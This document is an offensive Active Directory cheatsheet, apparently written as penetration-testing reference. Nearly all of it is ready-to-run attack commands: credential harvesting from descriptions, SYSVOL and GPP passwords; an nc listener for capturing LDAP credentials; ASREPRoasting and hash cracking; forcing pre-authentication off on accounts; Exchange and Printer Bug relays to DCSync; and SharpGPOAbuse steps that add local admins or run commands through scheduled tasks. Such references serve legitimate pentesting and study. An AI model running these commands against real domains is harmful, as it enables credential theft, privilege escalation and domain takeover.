Miscellaneous Misconfigurations Cheatsheet
Credential Harvesting
Passwords in Description Field
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}
PASSWD_NOTREQD Accounts
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
SYSVOL Script Hunting
ls \\<DC>\SYSVOL\<DOMAIN>\scripts
cat \\<DC>\SYSVOL\<DOMAIN>\scripts\<interesting_script>
GPP Passwords
# Decrypt cpassword
gpp-decrypt <CPASSWORD_VALUE>
# CrackMapExec modules
crackmapexec smb <DC_IP> -u <USER> -p <PASS> -M gpp_password
crackmapexec smb <DC_IP> -u <USER> -p <PASS> -M gpp_autologin
# PowerSploit
Get-GPPPassword
Get-GPPAutologon
Sniff LDAP Credentials
# Listen for LDAP test connections from printers/apps
nc -lvnp 389
Change the LDAP server IP in the device’s admin console to your attack host, then trigger “Test Connection.”
ASREPRoasting
Enumerate (Windows)
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
Attack (Windows — Rubeus)
.\Rubeus.exe asreproast /user:<USER> /nowrap /format:hashcat
Attack (Linux — Impacket)
GetNPUsers.py DOMAIN/ -dc-ip <DC_IP> -no-pass -usersfile valid_ad_users
Attack (Linux — Kerbrute)
kerbrute userenum -d <DOMAIN> --dc <DC_IP> /path/to/userlist.txt
Crack
hashcat -m 18200 asrep_hashes /usr/share/wordlists/rockyou.txt
Force DONT_REQ_PREAUTH (requires GenericWrite/GenericAll)
Set-DomainObject -Identity <USER> -XOR @{useraccountcontrol=4194304}
# Attack, then reverse:
Set-DomainObject -Identity <USER> -XOR @{useraccountcontrol=4194304}
Exchange Abuse
Enumerate Exchange Group Membership
Get-DomainGroupMember "Exchange Windows Permissions" | select MemberName
Get-DomainGroupMember "Organization Management" | select MemberName
PrivExchange
Requires any domain user with a mailbox. Forces Exchange to authenticate to attacker host → relay to LDAP → DCSync.
Printer Bug (MS-RPRN)
Enumerate
Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName <TARGET_FQDN>
Exploit
Coerce authentication to attacker host, then relay (e.g., to LDAP for DCSync rights or RBCD).
DNS Record Enumeration
# Initial dump
adidnsdump -u DOMAIN\\user ldap://<DC_IP>
head records.csv
# Resolve unknown records
adidnsdump -u DOMAIN\\user ldap://<DC_IP> -r
head records.csv
GPO Abuse
Enumerate
# List all GPOs
Get-DomainGPO | select displayname
# Check Domain Users rights over GPOs
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}
# Resolve GUID to GPO name
Get-GPO -Guid <GUID>
Exploit (SharpGPOAbuse)
# Add local admin
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <USER> --GPOName "<GPO_NAME>"
# Add user privilege
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeDebugPrivilege" --UserAccount <USER> --GPOName "<GPO_NAME>"
# Create immediate scheduled task
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "<TASK>" --Author DOMAIN\admin --Command "cmd.exe" --Arguments "/c <COMMAND>" --GPOName "<GPO_NAME>"
BloodHound
Look for edges: GenericWrite, WriteOwner, WriteDacl on GPO objects. Check “Affected Objects” tab to see linked OUs and computers.
Audit
group3r, ADRecon, PingCastle
Quick Reference
| Misconfiguration | Tool | Impact |
|---|---|---|
| Password in Description | PowerView Get-DomainUser | Credential harvesting |
| PASSWD_NOTREQD | PowerView -UACFilter | Empty/weak password accounts |
| SYSVOL scripts | Manual / Snaffler | Plaintext credentials |
| GPP passwords | gpp-decrypt / CrackMapExec | Decryptable credentials |
| LDAP creds in devices | netcat listener | Service account credentials |
| ASREPRoasting | Rubeus / GetNPUsers.py / Kerbrute | Offline hash cracking |
| Exchange groups | PowerView group enumeration | DCSync / mailbox access |
| PrivExchange | ntlmrelayx.py | Domain Admin |
| Printer Bug | Get-SpoolStatus / SpoolSample | NTLM relay → DCSync / RBCD |
| DNS records | adidnsdump | Hidden host discovery |
| GPO abuse | SharpGPOAbuse / BloodHound | Local admin / priv esc / RCE |